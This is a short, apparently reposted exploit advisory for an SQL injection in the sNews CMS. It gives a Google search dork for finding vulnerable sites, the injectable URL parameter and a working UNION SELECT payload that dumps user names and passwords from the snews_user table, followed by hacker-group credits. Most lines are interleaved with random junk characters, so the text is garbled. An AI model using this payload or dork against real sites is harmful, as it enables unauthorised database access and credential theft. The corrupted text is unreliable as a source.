标题: CMS snews SQL Injection Vulnerability
6 r/ i) {( R5 D8 x L+ @+ h作者: By onestree
- m- U7 m( \7 O3 r0 c9 c/ J下载地址 : http://snewscms.com/' D9 w& ~: C2 l/ K! p: Z
测试平台 : ubuntu 12.10 / win 7
# B, U( x+ Z) l关键词: inurl:"tanyakan pada rumput yang bergoyang"$ k) B" W+ l/ d6 v) q M
) @) K; Q6 g# u; w2 q7 L: W' V" Q
Q' d( {/ N. I/ u- e$ @*************************************************************8 S6 I1 f! M( `' Y4 ^
7 H+ G5 S: @. B2 [* G: xSQL poc:
1 X; K8 u& c+ P% S: X ) l& c" x0 |* h& v8 R7 u1 q5 e
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
5 }! l0 ?. O) ~& d s, s5 o * O" X. W# j Y h4 u- M! i
示例
5 f( }0 S3 K5 W* o& R5 f 5 x8 w F c8 G/ I
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
6 Z1 ~: R- W. T3 d8 S- U2 r
% v5 H/ b! F! t! N0 ^. K; h
! E5 [+ b" _+ X+ [9 r% S ]致谢:
+ z! E4 A3 Y" ~/ h* R ; }' R# L/ {5 a; V7 {
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
5 C. H5 Y/ Y+ B8 _: x; _/ |
6 C* a# {# p6 S# s) W indonesiancoder - moeslimh4x0r - go-coder0 Y. t2 _) _; _
6 l& M9 K1 ~, ~. i
spesial my hunny :*( q; a3 @8 Q0 h. [
|